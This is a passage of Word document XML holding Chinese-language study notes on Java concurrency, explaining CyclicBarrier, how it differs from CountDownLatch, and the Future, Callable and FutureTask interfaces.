          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个执行步骤。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D73831" w:rsidRPr="00D73831" w:rsidRDefault="00D73831" w:rsidP="00E54239">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用场景：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E54239" w:rsidRPr="00F41A4C" w:rsidRDefault="00E54239" w:rsidP="00E54239">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CyclicBarrier</w:t>
      </w:r>
      <w:r w:rsidR="00843150">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>同步屏障</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E54239" w:rsidRDefault="00E54239" w:rsidP="00E54239">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D73831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CyclicBarrier</w:t>
      </w:r>
      <w:r w:rsidR="00D73831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的字面意思是</w:t>
      </w:r>
      <w:r w:rsidR="00D73831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Cyclic</w:t>
      </w:r>
      <w:r w:rsidR="00D73831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的屏障</w:t>
      </w:r>
      <w:r w:rsidR="00D73831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(Barrier)</w:t>
      </w:r>
      <w:r w:rsidR="00D73831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。它做的事情就是让一组线程达到一个屏障</w:t>
      </w:r>
      <w:r w:rsidR="00D2576A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00D2576A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>也可以叫同步点</w:t>
      </w:r>
      <w:r w:rsidR="00D2576A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D73831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时被阻塞，直到</w:t>
      </w:r>
      <w:r w:rsidR="00D73831" w:rsidRPr="00A76D1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>最后一个线程</w:t>
      </w:r>
      <w:r w:rsidR="00A76D1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A76D1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>注意是</w:t>
      </w:r>
      <w:r w:rsidR="00A76D1A" w:rsidRPr="009C01CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>最后一个！！</w:t>
      </w:r>
      <w:r w:rsidR="00A76D1A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00D73831">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到达屏障时，屏障才会开门，所有被屏障拦截的线程才会继续运行。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D74E8" w:rsidRDefault="002D74E8" w:rsidP="00E54239">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应用场景：多线程计算数据，最后合并结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B46D37" w:rsidRPr="00F41A4C" w:rsidRDefault="00B46D37" w:rsidP="00B46D37">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r w:rsidR="002938B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7.2</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CountDownLatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CyclicBarrier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B46D37" w:rsidRPr="00F904FD" w:rsidRDefault="00B46D37" w:rsidP="00E54239">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>countDownLatch</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的计数器只能使用一次，而</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CyclicBarrier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的计算器可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>reset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法重置。所以</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>CyclicBarrier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以使用更为复杂的业务场景。例如，如果计算法发生错误，可以重置计数器，并让线程重新执行一次。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F4F28" w:rsidRPr="00F41A4C" w:rsidRDefault="001F4F28" w:rsidP="00E54DC3">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.3.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="002938B4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>.3</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidR="00E47081">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r w:rsidR="002E3768">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>与</w:t>
      </w:r>
      <w:r w:rsidR="002E3768">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Callable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83533" w:rsidRDefault="00B83533" w:rsidP="00B83533">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>jdk1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始我们可以利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来跟踪异步计算的结果。在此之前主线程要想获得工作线程</w:t>
      </w:r>
      <w:r w:rsidRPr="009475F8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>（异步计算线程）的结果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是比较麻烦的事情，需要我们进行特殊的程序结构设计，比较繁琐而且容易出错。有了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们就可以设计出比较优雅的异步计算程序结构模型：根据分而治之的思想，我们可以把异步计算的线程按照职责分为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83533" w:rsidRDefault="00B83533" w:rsidP="00B83533">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异步计算的</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6651C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>发起线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（控制线程）：负责异步计算任务的分解和发起，把分解好的任务交给异步计算的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>work</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>线程去执行，发起异步计算后，发起线程可以获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Futrue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的集合，从而可以跟踪异步计算结果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83533" w:rsidRDefault="00B83533" w:rsidP="00B83533">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异步计算</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6651C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>work</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6651C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：负责具体的计算任务</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B83533" w:rsidRDefault="00B83533" w:rsidP="00B83533">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>异步计算结果</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6651C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>收集线程</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：从发起线程那里获得</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的集合，并负责监控</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的状态，根据</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的状态来处理异步计算的结果。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495BF1" w:rsidRDefault="00495BF1" w:rsidP="00B83533">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>提供了</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>Callable</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>接口，该接口是</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>接口的增强版，</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>Callable</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>接口提供了一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>call()</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>方法，可以作为线程执行体，但</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>call()</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>方法比</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>run()</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>方法的功能更强大。</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>(1)</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>call()</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>方法可以有返回值。</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
        <w:t>(2)</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>call()</w:t>
      </w:r>
      <w:r w:rsidRPr="00495BF1">
        <w:t>方法可以声明抛出异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00021895" w:rsidRDefault="00021895" w:rsidP="00021895">
      <w:pPr>
        <w:pStyle w:val="a4"/>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lastRenderedPageBreak/>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>在工具开发包中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">java 5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>提供了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接口来代表</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Callable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接口里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法的返回值，并且为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接口提供了一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FutureTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>实现类，该实现类实现了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Future</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接口，并且实现了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Runnable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>——</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>可以作为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>target</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。实际上这里的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>FutureTask</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类实现了一个桥梁的作用，用于连接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Callable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Thread</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>对象。需要注意的是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Callable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接口有泛型限制，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Callable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>接口里的泛型形参类型，与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>call()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>方法的返回值类型相同。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00021895" w:rsidRDefault="00021895" w:rsidP="00021895">
      <w:pPr>
        <w:pStyle w:val="a4"/>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接口</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Callable&lt;V&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">V call() throws Exception </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>计算结果，如果无法计算结果，则抛出一个异常。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00021895" w:rsidRDefault="00021895" w:rsidP="00021895">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="390" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>类</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> FutureTask&lt;V&gt;  V - </w:t>
      </w:r>
